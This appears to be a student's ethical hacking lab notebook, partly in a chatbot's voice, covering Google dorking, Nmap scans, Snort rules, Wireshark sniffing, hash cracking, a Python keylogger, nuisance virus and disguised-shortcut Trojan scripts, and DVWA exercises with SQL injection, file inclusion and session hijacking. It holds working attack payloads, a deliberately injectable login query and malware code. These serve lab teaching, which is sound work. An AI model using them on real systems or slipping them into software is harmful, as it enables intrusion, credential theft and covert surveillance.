✅ PRACTICAL 2 – Footprinting Using Google Hacking Operators

---

⭐ A. Perform Footprinting Using Google Hacking Commands Google hacking uses Google search operators to extract sensitive information from websites. Below are the answers for each question.

---

🔶 Q1. Find pages containing Biking and Italy** biking AND italy

---

🔶 Q2. Find pages containing Recycle steel OR iron recycle steel OR iron

---

🔶 Q3. Find exact phrase "I have a dream" "I have a dream"

---

🔶 Q4. Find pages with Salsa but NOT Dance salsa -dance

---

🔶 Q5. Find pages that have Louis with first ‘L’ (weeding out kings of France) Meaning: find Louis as a name, not Louis XIV etc. "Louis I" -king -France

---

🔶 Q6. Display glossary about castle glossary castle OR define:castle

---

🔶 Q7. Display all forms of the term fortune-telling fortune telling OR show variations: "fortune telling" OR "fortunetelling" OR "fortune-telling"

---

🔶 Q8. Display definition of imbroglio define:imbroglio

---

⭐ CALCULATIONS USING GOOGLE Google search bar works as calculator.

---

🔶 Q1. Basic arithmetic Example: 5 + 7 - 3

---

🔶 Q2. Percentage Example: find 20% of 350 20% of 350

---

🔶 Q3. Raise to power 5^3

---

🔶 Q4. Convert units 100 meters to feet

---

⭐ RESTRICT SEARCH

---

🔶 Book flights from SFO to BOS flights sfo to bos

---

🔶 Find Halloween data by US Census Bureau halloween "US Census Bureau"

---

🔶 Dave Berry articles mentioning pirates written in these years Example (2000–2010): "Dave Barry" pirates 2000..2010

---

🔶 US Tax Form 1098-T (PDF) "1098-T" filetype:pdf

---

🔶 Find pages linking to Warrior Librarian link:warriorlibrarian.com

---

⭐ SPECIALIZED INFORMATION QUERIES

---

🔶 Book-related information books about [topic] OR books related to

---

🔶 Definition of monopsony & podcast define:monopsony define:podcast

---

🔶 Definitions for kerning define:kerning OR kerning typography

---

🔶 Movie information (reviews, showtimes) [Movie name] reviews showtimes

---

🔶 Google’s current stock price Google stock price

---

🔶 Current weather & forecast weather in mumbai

---

⭐ ALTERNATIVE QUERY TYPES

---

🔶 Display Google’s cached version of a webpage cache:example.com

---

🔶 Information about The Onion website info:theonion.com

---

🔶 Websites related to HealthFinder website related:healthfinder.gov

---

⭐ RESTRICT SEARCH TO SITES WHERE WORDS APPEAR (Anchors, URLs, Titles)

---

🔶 Useful parenting sites inanchor:"useful parenting sites"

---

🔶 Portland restaurants called “kid friendly” portland restaurants inanchor:"kid friendly"

---

🔶 Recipes for three ingredients recipes "chicken" "milk" "garlic"

---

🔶 Pages mentioning Dan Shugar & powerlight "Dan Shugar" "Powerlight"

---

🔶 Titles containing Google, Advanced, Operators allintitle: google advanced operators

---

🔶 Movie + Comedy & “top ten” in title movie comedy intitle:"top ten"

---

🔶 Pages with pez & faq in URL allinurl: pez faq

---

🔶 Pages where URL contains “investor” inurl:investor

---

⭐ RESTRICT SEARCH TO GOOGLE GROUPS

---

🔶 Stephen King’s articles on horror author:"Stephen King" horror group:*

---

🔶 Posts about Ivan Doig in rec.arts.books "Ivan Doig" group:rec.arts.books

---

🔶 Articles containing “crazy quilts” in subject line subject:"crazy quilts"

---

⭐ GOOGLE HACKING QUESTIONS (Practice)

---

🔶 Pages containing SIESCOMS and MCA SIESCOMS AND MCA

---

🔶 Paints saffron OR green OR white paints saffron OR green OR white

---

🔶 Exact phrase “City of Joy” "City of Joy"

---

🔶 Ethical but NOT Hacking ethical -hacking

---

🔶 Glossary about cyberlaw glossary cyberlaw

---

🔶 All forms of Sum-of-Numbers "sum of numbers" OR "sum-of-numbers"

---

🔶 Definition of terrorism define:terrorism

---

⭐ CALCULATOR (Google)

---

🔶 Calculate 105 – 100 * 20 105 - 100 * 20

---

🔶 35% of 68 35% of 68

---

🔶 Convert 100m to feet 100 meters to feet

---

⭐ RESTRICTIVE SEARCH (Indian context)

---

🔶 Book flights from Mumbai to Delhi flights mum to del

---

🔶 Diwali information from Indian govt site diwali site:india.gov.in

---

🔶 Bill Gates articles mentioning pirates (2010–2020) "Bill Gates" pirates 2010..2020

---

🔶 Form 16 / ITR in PDF "Form 16" filetype:pdf

---

🔶 Pages linking to amazon.in link:amazon.in

---

⭐ Specialized Queries (Indian version)

---

🔶 Chanakya book information chanakya books

---

🔶 Define anarchy, what is monopoly define:anarchy define:monopoly

---

🔶 Hacker movies hacker movies

---

🔶 TCS stock price TCS share price

---

🔶 Weather in Mumbai weather mumbai

---

⭐ Examples of Operators Here are clear, simple examples of each Google search operator you listed. Use these exact examples in your exam or assignment.

---

🔍 1. cache: Shows Google’s cached (saved) version of a webpage. Example: cache:example.com

---

🔍 2. info: Shows information about a website (similar pages, cached version, etc.) Example: info:example.com

---

🔍 3. related: Shows websites similar to the given website. Example: related:youtube.com

---

🔍 4. allinanchor: Searches for pages where all keywords appear in anchor text (text inside links pointing to that page). Example: allinanchor: best iphone reviews

---

🔍 5. inanchor: Pages where the exact word appears in anchor text. Example: inanchor: "buy laptop"

---

🔍 6. allintext: Search pages that contain all the specified words in the text (not necessarily together). Example: allintext: python data structures tutorial

---

🔍 7. intext: Search for pages where the word/phrase appears in the body text. Example: intext: "ethical hacking tools"

---

🔍 8. allintitle: Search pages with all the words in the page title. Example: allintitle: java multithreading tutorial

---

🔍 9. intitle: Search pages with a specific word in the title. Example: intitle: "SQL injection"

---

🔍 10. allinurl: Search pages that have all words in the URL. Example: allinurl: hacking tutorial basics

---

🔍 11. inurl: Search pages that have a specific word in the URL. Example: inurl: login

---

---

⭐ F. Restrict Search for Google Groups using author, group, subject Example queries: author:"john doe" group:rec.arts.books subject:"security"

---

⭐ G. Restrict Search to Google News (location + source) Examples location:mumbai rain alert source:timesofindia.com

---

⭐ B. Get information about a website (WHOIS) Step:

1. Go to:
2. http://whois.domaintools.com
3. Type the domain → See owner, IP, registrar, DNS, etc.

---

⭐ C. Archived website (Wayback Machine)

1. Visit:
2. www.archive.org
3. Search:
4. siescoms.edu
5. Select year 2013
6. Select date 23 April
7. Show screenshot.

---

⭐ DNS Lookup (IP + Aliases) Method 1 — Command Prompt nslookup www.indiana.edu nslookup www.gmail.com Method 2 — ping.eu

1. Open:
2. https://ping.eu
3. Click DNS Lookup
4. Enter domain
5. View: o IP address o Aliases (CNAME)

---

---

3A,B 🧠 Topic: Port Scanning & Network Scanning using Nmap

---

⚙️ What is Nmap? Nmap (Network Mapper) is a free and open-source tool used to: • Discover computers (hosts) connected to a network • Find open ports on those computers • Identify the operating system and services running • Help ethical hackers and network administrators secure the system You can use it on Windows, Linux, or macOS.

---

🧩 Before Using Nmap If you are using Windows, you also need to install Npcap. It helps Nmap capture and send packets over the network. 👉 Download link: https://nmap.org/download.html 🅰️ PART A: Port Scanning 🔍 What is Port Scanning? Every device connected to the internet has ports (like small doors). Each port is used by a specific service (like web, mail, FTP, etc). Example: • Port 80 → HTTP (websites) • Port 443 → HTTPS (secure websites) • Port 22 → SSH (remote login) • Port 25 → SMTP (email) 👉 Port scanning checks which ports are open, closed, or filtered.

---

1️⃣ Scan open ports Command: nmap --open <ip_address or URL> Example: nmap --open 127.0.0.1 Explanation: • --open → shows only open ports. • 127.0.0.1 → your own computer (localhost).

✅ You can see which ports are open and what services they run.

---

2️⃣ Scan a single port Command: nmap -p 80 127.0.0.1

Explanation: • -p specifies a particular port. • This checks whether port 80 is open.

---

3️⃣ Scan a range of ports Command: nmap -p 1-200 <ip_address>

4️⃣ Scan entire port range Command: nmap -p 1-65535 <ip_address>

5️⃣ Fast scan (Top 100 ports) Command: nmap -F <ip_address>

Explanation: • -F = Fast mode → scans only top 100 most commonly used ports. • Saves time and gives quick results.

---

🔗 Reference Videos/Websites: • https://techtalk.gfi.com/scanning-open-ports-in-windows-part-3-nmap/ 🅱️ PART B: Network Scanning 🌐 What is Network Scanning? Network scanning finds all devices (hosts) connected to a network and gathers info such as: • IP address • MAC address • Operating System (OS) • Open ports • Services running Used for network discovery and security auditing.

---

1️⃣ Ping Scan Command: nmap -sP 192.168.1.0/24

Explanation: • -sP (now -sn in newer versions) sends ping requests to find which hosts are alive. • Returns a list of devices connected to your network.

2️⃣ Host Scan (ARP scan) Command: nmap -sP

This is similar to Ping Scan but more detailed. Explanation: • Sends ARP requests to every host in the network. • Each host replies with its MAC address. • Helps identify each device on your LAN.

---

If you find a suspicious host, you can find its DNS name using: Command:

nmap -sL 192.168.1.5

Explanation: • Lists the hostname associated with that IP. • Helps you know which device it is (printer, PC, router, etc).

---

3️⃣ OS Scan Command: nmap -O Explanation: • -O stands for Operating System detection. • Nmap tries to guess which OS (Windows/Linux/Mac) the target is using.

💡 More Nmap Commands (Advanced) 1️⃣ Scan IPs from a text file Command: nmap -iL <filename.txt> Explanation: • If you have a list of IP addresses in a file (one per line), Nmap will scan all of them automatically.

---

2️⃣ Aggressive Scan Command: nmap -A <ip_address>

Explanation: • Performs detailed scanning: o OS detection o Version detection o Script scanning o Traceroute • Gives maximum information about the target.

3️⃣ Traceroute Command: nmap --traceroute <ip_address> Explanation: • Shows the path your packets take to reach the destination. • Helps identify routers or hops between you and the target.

---

🧩 PRACTICAL 3C — Intrusion Detection using Snort

---

🧠 What is Intrusion Detection? 👉 Intrusion Detection System (IDS) is a tool that monitors network traffic and looks for suspicious activity — such as hackers trying to break in or malicious packets traveling through the network. • Think of IDS as a security guard for your network. • It doesn’t stop traffic (like a firewall), but it alerts you when something suspicious happens.

---

🧰 What is Snort? Snort is a free, open-source Intrusion Detection and Prevention System (IDS/IPS) created by Cisco. It: • Watches your network traffic in real-time. • Uses a set of rules to detect attacks or anomalies. • Generates alerts when it detects something suspicious.

---

⚙️ How Snort Works (Step-by-Step) 1️⃣ Install Snort and Npcap • Download from: https://www.snort.org/downloads • Install in default directory: C:\Snort 2️⃣ Check if Snort is installed properly snort -V ✅ Shows the Snort version installed. 3️⃣ List all network adapters snort -W ✅ Displays available network interfaces with numbers. Example:

1. Intel(R) Wi-Fi Adapter
2. Ethernet Adapter
3. Loopback Adapter You’ll use one of these numbers (e.g., -i 3) for monitoring. 4️⃣ Prepare necessary directories C:\Snort\rules C:\Snort\log 5️⃣ Edit Snort configuration file Open this file: C:\Snort\etc\snort.conf and check for these lines:

Define local and external networks

var HOME_NET 10.1.5.0/24 var EXTERNAL_NET any

Define rule and log paths

var RULE_PATH C:\Snort\rules var LOG_PATH C:\Snort\log

Output format

output alert_fast: alert.fast

Include local rules

include $RULE_PATH/local.rules ✅ This tells Snort where your network and rule files are.

---

✍️ Create Custom Rules Open this file: C:\Snort\rules\local.rules Add these lines:

Detect ICMP (Ping)

alert icmp any any -> $HOME_NET any (msg:"ICMP Ping Detected"; sid:1000001;)

Detect HTTP Traffic

alert tcp any any -> any 80 (msg:"HTTP Traffic Detected"; flow:to_server,established; sid:1000002;)

Detect TCP SYN Port Scans

alert tcp any any -> any any (flags:S; msg:"TCP SYN Scan Detected"; threshold:type both, track by_src, count 5, seconds 60; sid:1000003;) ✅ These are your Snort rules — each one defines a pattern that triggers an alert.

---

🧱 Verify Snort Libraries Ensure the following folders exist: C:\Snort\lib\snort_dynamicpreprocessor C:\Snort\lib\snort_dynamicengine C:\Snort\lib\snort_dynamicrules These contain important Snort modules.

---

▶️ Run Snort as Administrator Example command: snort -i 6 -A console or snort -c C:\Snort\etc\snort.conf -i 6 -A console ✅ -i 6 → network interface number ✅ -A console → show alerts on screen ✅ -c → specify the configuration file Output Example: Initializing Network Interface 6: Intel(R) 82579LM Gigabit Network Connection Commencing packet processing

---

✅ Example: Local Tests Test 1 – ICMP Ping ping 10.1.1.255 In Snort console, you’ll see: [] [1:1000001:0] ICMP Ping detected [] [Priority: 0] 10/06-15:45:33.123456 -> ICMP Echo Request Test 2 – HTTP Request or Port Scan nmap -sS 10.119.154.236 or visit any website — Snort detects it.

---

🧩 PRACTICAL 3D — Network Sniffing using Wireshark

---

🧠 What is Wireshark? Wireshark is a packet analyzer — it captures all the network traffic (data packets) going in and out of your computer. It is mainly used for: • Network troubleshooting • Protocol analysis • Cybersecurity investigation • Education

---

🧰 Tools used • Wireshark (GUI version) • TShark (command-line version) Both do the same thing; Wireshark just has a graphical interface.

---

⚙️ How Wireshark Works (Step-by-Step) 1️⃣ Capture and Analyse Packets Steps:

1. Open Wireshark.
2. Select your network interface (Ethernet, Wi-Fi, or Loopback).
3. (Optional) Apply a capture filter (to capture specific packets only). Example capture filters: tcp port 80 host 127.0.0.1
4. Click Start Capture (blue shark fin icon).
5. Perform some network activity (e.g., open a website).
6. Click Stop (red square).
7. View details of packets captured.
8. Save results using File → Save As.

---

2️⃣ Apply Filters and Analyse Data Common Display Filters: • Show only HTTP packets: • http • Show only POST requests: • http.request.method == "POST" • Find a specific string: • frame contains "admin@google.com"

---

🕵️ Network Sniffing Example (HTTP Login) This demo shows how Wireshark can capture sensitive data if the site is not using HTTPS. Step-by-step:

1. Start Wireshark and start capturing packets.
2. Visit http://testfire.net/index.jsp (insecure website).
3. Login using: o Username: admin o Password: admin
4. In Wireshark, apply the filter:
5. http
6. In the packet list, look for HTTP POST requests — they will show login info like:
7. POST /index.jsp HTTP/1.1
8. username=admin&password=admin ✅ This shows how insecure (non-HTTPS) sites can leak login credentials.

---

Perfect 👍 Let’s now break down your “EH Prac 4 (91).docx” file completely — line by line, concept by concept — so that you can understand everything even if you know nothing about Ethical Hacking and can perform and explain all practicals confidently in your exam.

---

🧩 PRACTICAL 4 — Malware Threats, Password Cracking, Attacks & Network Tools

---

🔐 A. Malware Threats 🧠 What is Malware? Malware = “Malicious Software” → software designed to harm, steal data, or disrupt systems.

---

🧩 PASSWORD CRACKING Password cracking means recovering passwords from stored data (hashes). Attackers use this to test password strength — ethical hackers use it for auditing.

---

🔑 Step 1: Generate MD5 Hash Tool: MD5 Hash Generator 👉 MD5 converts a word into a unique 32-character hash code (one-way encryption). So, once a password is hashed, you can’t directly read it, but you can try to “crack” it.

---

🔎 Step 2: Crack MD5 Hash Tool: crackstation.net Paste the hash (e.g., e66055e8e308770492a44bf16e875127) ✅ CrackStation compares it with a huge database of known passwords. If it finds a match → it gives you the original password.

---

🔍 Step 3: Analyze Results Conclusion: • Passwords using variety of characters (uppercase, lowercase, numbers, special symbols) are harder to crack. • Simple passwords are easily found using dictionary or rainbow tables. • Hence, always use strong passwords. In short: Longer + complex passwords = higher security.

---

🧩 B. Dictionary Attack (Using Python)

---

💡 Concept: A Dictionary Attack tries passwords from a list (dictionary) of common words until it finds the correct one.

---

🧰 Requirements:

1. Install Python 3.7 Download: https://www.python.org/downloads/release/python-370/ → During installation, select Custom Installation → Keep install path short (like C:\Python37)
2. Create a Password List File o File name: passlist.txt o Example content: o admin o password o admin123 o qwerty o hello123
3. Get MD5 hash of a password o Use Visiospark MD5 Tool o Example: o password → 5f4dcc3b5aa765d61d8327deb882cf99

---

🧮 Python Code (dictattack.py) import hashlib

flag = 0 p_hash = input("Enter MD5 hash: ") dictionary = input("Enter dictionary filename: ")

try: password_file = open(dictionary, "r") except FileNotFoundError: print("No file found") quit()

for word in password_file: enc_word = word.strip().encode('utf-8') # remove spaces/newlines digest = hashlib.md5(enc_word).hexdigest()

if digest == p_hash:
    print("Password has been found")
    print("Password is:", word.strip())
    flag = 1
    break

if flag == 0: print("No password found")

---

⚙️ Run Program: In CMD: d:\passwordcracking> python dictattack.py Example Run: Enter MD5 hash: 5f4dcc3b5aa765d61d8327deb882cf99 Enter dictionary filename: passlist.txt Password has been found Password is: password ✅ Successfully cracked the password.

---

🧩 C. Encrypt & Decrypt Passwords (Online Tools)

---

🔧 Tool 1: DNSChecker Password Encryption Utility • Enter any password • It shows encrypted outputs using different algorithms like MD5, SHA-1, SHA-256, SHA-512, Base64, etc. 🔧 Tool 2: Hashes.com Decryptor • Paste the hash here. • If it matches a known hash in their database, it gives the original text. ✅ Demonstrates the difference between encryption (convert text to coded form) and decryption (recover text).

---

🧩 D. DoS (Denial of Service) Attacks

---

💡 Concept: A DoS Attack aims to make a network or server unavailable to users by flooding it with traffic.

---

⚔️ 1. Ping of Death Ping normally sends small ICMP packets (<65,535 bytes). Attackers send oversized packets in fragments that crash or freeze the system when reassembled. Steps:

1. Attacker creates an oversized packet (>65,535 bytes).
2. Breaks into small fragments.
3. Target reassembles → memory overflow.
4. System freezes/reboots.

---

⚔️ 2. TCP SYN Flooding A TCP connection starts with a 3-way handshake: SYN → SYN-ACK → ACK In a SYN flood: • Attacker sends many SYN requests. • Server replies with SYN-ACK. • Attacker never sends ACK back. • Server keeps connections half-open → memory full → real users blocked.

---

⚔️ 3. Smurf Attack Attacker floods a network by spoofing the victim’s IP and sending ping requests to the broadcast address. Steps:

1. Attacker sends ping to 192.168.1.255 (broadcast IP).
2. Source IP is replaced by victim’s IP.
3. Every host on network replies to victim.
4. Victim is overwhelmed and crashes.

---

🧩 E. ARP Poisoning (in Windows)

---

🧠 What is ARP? ARP (Address Resolution Protocol) links an IP address to a MAC address in a network. Example: When your PC wants to talk to your router, it first asks: “Who has IP 192.168.1.1?” Router replies with its MAC address.

---

💀 ARP Poisoning Attack Process

🧰 Using Cain & Abel for ARP Poisoning

1. Install Cain & Abel (with WinPcap). o Disable antivirus (it may flag it).
2. Open Sniffer Tab o Select active network interface.
3. Scan for Hosts o Click “+” → it lists all devices on LAN.
4. Select Targets o Left: victim machine o Right: router
5. Start APR Poisoning o Click the yellow radioactive icon.
6. Intercept Traffic o Monitor credentials in “Passwords” tab or analyze in Wireshark.
7. Stop Attack o Click icon again → restores normal ARP tables.

---

🧩 F. Basic Network Commands

---

🖥️ 1. ipconfig Shows current network configuration: ipconfig or detailed: ipconfig /all ✅ Shows IP address, MAC address, DNS, and gateway.

---

📡 2. ping Checks if a device is reachable. ping 8.8.8.8 ✅ Sends packets and waits for replies.

---

🛣️ 3. tracert Shows the path packets take to reach destination. tracert www.google.com ✅ Useful for checking delays and routing issues.

---

🔍 4. netstat Displays active connections and ports. netstat -an ✅ Shows open TCP/UDP connections and their IP addresses.

---

🧩 G. Steganography (Hiding Data)

---

🧠 What is Steganography? It’s the art of hiding secret information inside other files — such as an image or audio — so nobody knows it’s there. Tool used: S-Tools

---

🔧 Steps:

1. Prepare Secret File: Example → ME.txt (your secret message).
2. Launch S-Tools
3. Select Host File: Drag an image (e.g., img1.bmp) into the tool.
4. Hide Secret File: Drag and drop ME.txt onto the image in S-Tools.
5. Enter Password & Choose Encryption Algorithm → Tool creates a new image (e.g., data.bmp) that looks identical but has the hidden file inside.
6. To Reveal: o Open data.bmp in S-Tools o Right-click → Reveal o Enter password and algorithm to extract ME.txt ✅ This is how hackers or forensic analysts hide or uncover secret data.

---

---

🧩 PRACTICAL 5 — Keylogger, Virus, and Trojan

---

🧠 Overview This practical focuses on how cyberattacks can be created and prevented using small programs. You’ll learn about: • Keylogger – captures keystrokes • Virus – self-replicating program that can harm systems • Trojan – fake program that hides malicious code ⚠️ Note: You are learning these for educational and ethical hacking purposes only — never misuse them.

---

🧩 PART A — Create a Keylogger in Python

---

🧠 What is a Keylogger? A Keylogger is a program that records every key pressed on a keyboard. It is used for: • Ethical monitoring (like employee/school use) • Cyber investigations • But hackers misuse it to steal passwords, chats, etc.

---

🧰 Required Tool: • Python (version 3.7+) • pynput library (for capturing keyboard events)

---

🧩 Step-by-Step Explanation 🪜 Step 1: Install pynput In Command Prompt or Terminal: pip install pynput ✅ This installs the library used to monitor keyboard events.

---

🪜 Step 2: Import required modules from pynput.keyboard import Key, Listener import logging import os Explanation: • pynput.keyboard: lets you listen to keyboard input. • logging: used to store logs (key records) in a file. • os: helps manage file paths.

---

🪜 Step 3: Set up logging configuration log_dir = r"E:/Users/mca24091/Downloads/Keylogger/" log_path = os.path.join(log_dir, "keyLog.txt")

logging.basicConfig( filename=log_path, level=logging.DEBUG, format='%(asctime)s: %(message)s' ) Explanation: • log_dir → location where keystrokes will be saved. • filename → creates a file keyLog.txt to store all pressed keys. • format → includes date and time for every key press. So every key you press gets stored with a timestamp.

---

🪜 Step 4: Define the key press handler function def on_press(key): logging.info(str(key)) Explanation: • This function runs every time a key is pressed. • It records the key into the log file as text.

---

🪜 Step 5: Start the listener with Listener(on_press=on_press) as listener: listener.join() Explanation: • Listener() starts listening to all keypresses. • listener.join() keeps it running continuously.

---

✅ Full Code (for your practical notebook) from pynput.keyboard import Key, Listener import logging import os

log_dir = r"E:/Users/mca24091/Downloads/Keylogger/" log_path = os.path.join(log_dir, "keyLog.txt")

logging.basicConfig( filename=log_path, level=logging.DEBUG, format='%(asctime)s: %(message)s' )

def on_press(key): logging.info(str(key))

with Listener(on_press=on_press) as listener: listener.join()

---

📁 Output: When you run this, a file called keyLog.txt is created inside your folder. Inside it, you’ll see something like: 2025-11-11 12:00:01,234: 'H' 2025-11-11 12:00:02,500: 'e' 2025-11-11 12:00:03,200: 'l' 2025-11-11 12:00:03,400: 'l' 2025-11-11 12:00:04,000: 'o' ✅ Every key pressed is captured and stored.

---

⚠️ Ethical Note: • This should be tested only on your own computer. • Running it secretly on others’ systems is illegal.

---

🧩 PART B — Create a Simple Virus (Script Virus)

---

🧠 What is a Virus? A computer virus is a malicious program that can replicate itself and spread to other files or systems. It can: • Modify files • Slow down the system • Display annoying messages • Cause shutdowns or crashes

---

🧩 Code Example (VBScript Virus Simulation) set x=wscript.createobject("wscript.shell") do wscript.sleep 100 x.sendkeys"{CAPSLOCK}" x.sendkeys"{NUMLOCK}" x.sendkeys"I am a Virus" x.sendkeys"{SCROLLLOCK}" Loop

---

⚙️ Explanation (Line by Line) The script starts by creating a shell object using the command set x = wscript.createobject("wscript.shell"), which allows it to simulate keyboard input. Next, the do ... loop statement creates an infinite loop so the code keeps running continuously. The wscript.sleep 100 line pauses the execution for 100 milliseconds between each action. Then, x.sendkeys "{CAPSLOCK}" simulates pressing the Caps Lock key. After that, x.sendkeys "{NUMLOCK}" simulates pressing the Num Lock key. The command x.sendkeys "I am a Virus" makes the script automatically type the text “I am a Virus.” Finally, x.sendkeys "{SCROLLLOCK}" simulates pressing the Scroll Lock key.________________________________________ 🧮 What It Does: This script continuously toggles your keyboard lights (CapsLock, NumLock, ScrollLock) and types "I am a Virus" repeatedly. It doesn’t destroy data, but shows how a virus behaves in principle.

---

⚠️ Ethical Use: Never run harmful code on others’ systems. In labs, run this only on virtual machines or demo computers.

---

🧩 PART C — Create a Simple Trojan

---

🧠 What is a Trojan? A Trojan Horse looks like a normal program but hides malicious actions inside. Example: a fake “game” that secretly deletes files or shuts down your PC.

---

🧩 Steps to Create a Simple Fake Trojan

1. Right-click → New → Shortcut
2. In the “Location” box, type:
3. shutdown -s -t 50 -c "Shutdown the machine" Explanation: o shutdown → shuts down computer o -s → shutdown flag o -t 50 → delay (50 seconds before shutdown) o -c "message" → shows message “Shutdown the machine”
4. Click Next, name it something like Game.exe or SystemUpdate.
5. Right-click → Properties → Change Icon o Choose an icon that looks harmless (e.g., folder or app).

---

⚙️ What Happens When Someone Clicks It: The computer will display a message and shut down after 50 seconds. This demonstrates the “deceptive behavior” of a Trojan.

---

⚠️ Ethical Reminder: • This example is harmless but real trojans can steal data or create backdoors. • Use only for learning and demo purposes.

---

---

✅ PRACTICAL 6 — FULL STEP-BY-STEP GUIDE

---

⭐ PART A — Remote File Inclusion (RFI) + Local File Inclusion (LFI) using DVWA

---

🔶 STEP 1 — Install XAMPP

1. Download XAMPP 👉 https://www.apachefriends.org/index.html
2. Install it (default settings).
3. Open XAMPP Control Panel → Start: o Apache o MySQL

---

🔶 STEP 2 — Create a MySQL Database

1. Open CMD
2. Type:
3. mysql -u root
4. (DVWA automatically creates its own DB later).

---

🔶 STEP 3 — Download & Install DVWA

1. Download DVWA 👉 https://github.com/digininja/DVWA/archive/master.zip
2. Extract folder → rename it DVWA-master
3. Copy to:
4. C:\xampp\htdocs\
5. Go to:
6. C:\xampp\htdocs\DVWA-master\config\
7. Rename:
8. config.inc.php.dist → config.inc.php

---

🔶 STEP 4 — Setup DVWA

1. Open browser
2. Go to:
3. http://localhost/DVWA-master/setup.php
4. Scroll down → Click Create / Reset Database
5. DVWA is ready.

---

🔶 STEP 5 — Login to DVWA Go to: http://localhost/DVWA-master/login.php Enter: • Username: admin • Password: password Now you are inside DVWA.

---

⭐ PART A1 — Local File Inclusion (LFI) STEP 1 Open LFI module: http://localhost/DVWA-master/vulnerabilities/fi/ STEP 2 Default URL: ?page=include.php STEP 3 — Perform LFI Replace include.php with your local file. Example: ?page=../../../../xampp/htdocs/DVWA-master/sqlinjection/login.php This means: • You force DVWA to include another PHP file from your localhost. When executed, DVWA displays the contents of another local file → LFI success.

---

⭐ PART A2 — Remote File Inclusion (RFI) STEP 1 Open the same page: http://localhost/DVWA-master/vulnerabilities/fi/ STEP 2 — Replace ?page with a remote URL Example: ?page=http://www.google.com This forces DVWA to load Google’s website inside DVWA → Remote File Inclusion. ⚠️ Works only when security level = Low.

---

⭐ PART B — SQL Injection (Custom PHP website) This part uses your Login.php app (from the file).

---

🔶 STEP 1 — Create Database In MySQL: CREATE DATABASE studusers; USE studusers; Create table: CREATE TABLE login_user ( id int(11) NOT NULL, name varchar(60) NOT NULL, user_name varchar(50) NOT NULL, password varchar(300) NOT NULL ); Insert data: INSERT INTO login_user VALUES(1,'IT','admin','admin'); INSERT INTO login_user VALUES(2,'Vidya','vv','vv'); INSERT INTO login_user VALUES(3,'hacker','system','manager'); INSERT INTO login_user VALUES(4,'iamstrongest','system','Ethical@#$%Hacking');

---

🔶 STEP 2 — Save Login.php, Index.php, Logout.php Put all files in: C:\xampp\htdocs\project
Open in browser: http://localhost/project/login.php

Login.php:

0) { $con = mysqli_connect('127.0.0.1:3306','root','','studusers') or die('Unable To connect'); $result = mysqli_query($con,"SELECT * FROM login_user WHERE user_name='" . $_POST["user_name"] . "' and password = '". $_POST["password"]."'"); $row = mysqli_fetch_array($result); if(is_array($row)) { $_SESSION["id"] = $row['id']; $_SESSION["name"] = $row['name']; } else { $message = "Invalid Username or Password!"; } } if(isset($_SESSION["id"])) { header("Location:index.php"); } ?>

Enter Login Details

Username:

Password:

Index.php:

Welcome . Click here to Logout

Please login first."; } ?>

Logout.php:

---

🔶 STEP 3 — Perform SQL Injection In username field, type: ' OR 1=1-- Password: anything (even wrong) 👉 This bypasses login and redirects to index.php. Loginprevent.php

0) { $uname = $_POST["user_name"]; $pass = $_POST["password"]; $con = mysqli_connect('127.0.0.1:3306', 'root', '', 'studusers') or die('Unable To connect'); $sql = "SELECT * FROM login_user WHERE user_name=? AND password=?"; $stmt = $con->prepare($sql); $stmt->bind_param('ss', $uname, $pass); $stmt->execute(); $result = $stmt->get_result(); $row = mysqli_fetch_array($result); if(is_array($row)) { $_SESSION["id"] = $row['id']; $_SESSION["name"] = $row['name']; } else { $message = "Invalid Username or Password!"; } } if(isset($_SESSION["id"])) { header("Location:index.php"); } ?>

Enter Login Details

Username:

Password:

---

🟩 WHY IT WORKS? SQL query becomes: SELECT * FROM login_user WHERE user_name='' OR 1=1-- AND password='anything' 1=1 = always true -- = comments out rest of query So login bypass occurs.

---

⭐ PART A3 — Preventing SQL Injection Use Prepared Statements (provided in your file). This protects by treating input as data, not SQL code.

---

⭐ PART B — SQL Injection Testing with DVWA

---

🔶 STEP 1 — Create login_user table in DVWA DB Open: http://localhost/DVWA-master/setup.php Go to MySQL: USE dvwa; Create table: CREATE TABLE login_user (...); Insert same rows as before.

---

🔶 STEP 2 — Set DVWA Security Level Go to: DVWA → Security Set to: Low

---

🔶 STEP 3 — Perform SQL Injection Go to: SQL Injection module Try these inputs:

---

✔ 1. Check userid=1 1 Output: Firstname = admin Surname = admin (As your file says.)

---

✔ 2. Find number of columns 1' order by 2# ➡ Works → means 2 columns exist 1' order by 3# ➡ Error → column 3 doesn’t exist.

---

✔ 3. UNION SQL Injection Try these one-by-one: a) Basic true condition 1' or '1'='1 b) Extract username, password 1' UNION select user, password from users# c) Find MySQL user & DB 1' union select null, user() # 1' union select null, database() # d) Version of MySQL 1’ union select null, version()# e) Get all table names 1' union select null, table_name from information_schema.tables # f) Extract real data from studusers DB 1' union select null, concat(id,0x0a,name,0x0a,user_name,0x0a,password) from studusers.login_user# This will display: • id • name • username • password All in one output using hex 0x0a = newline.

---

⭐ PART C — Session Hijacking

---

🔶 STEP 1 — Install required tools • Wireshark (for sniffing) • EditThisCookie Chrome Extension 👉 https://chromewebstore.google.com/detail/editthiscookie-v3/ojfebgpkimhlhcblbalbfjblapadhbol

---

🔶 STEP 2 — Clear cookies Go to: http://localhost/DVWA-master/sqlinjection/login.php Right-click → Inspect → Console Type: document.cookie

---

🔶 STEP 3 — Capture admin session Login using: admin / password Look at cookie: PHPSESSID=vmjnsi2oc2oq7ctars6n68md71 Delete this session (logout).

---

🔶 STEP 4 — Victim login Login as: vv / vv Victim session: PHPSESSID=419bkir4i55g7cc5ovfcv5sb7r

---

🔶 STEP 5 — Perform Session Hijacking

1. Click EditThisCookie
2. Find PHPSESSID
3. Replace victim’s cookie with admin cookie: 419bkir4i55g7cc5ovfcv5sb7r
   → replace with
   vmjnsi2oc2oq7ctars6n68md71
4. Click ✔ (green tick)
5. Refresh page 👉 You will now be logged in as IT (admin) without entering password.

---

⭐ HOW TO PREVENT SESSION HIJACKING • Use HTTPS • Use VPN • Regenerate session IDs • HttpOnly cookies • Secure flag enabled • Short session timeout

---

Practical 7

---

CrypTool 2 — encrypt & decrypt (Caesar, Substitution, Playfair) What is CrypTool 2? CrypTool 2 is a free Windows application that demonstrates classical and modern cryptographic algorithms. Use it to experiment with ciphers and instantly see encryption/decryption results. (Your file shows how to use it for Caesar, Substitution and Playfair). Quick install notes (from your file) • Download the Stable EXE version (recommended). • Requires 64-bit Windows and .NET Framework 4.7.2+. • EXE installer can create Start Menu entry and shortcuts. • No admin rights required for normal install.

---

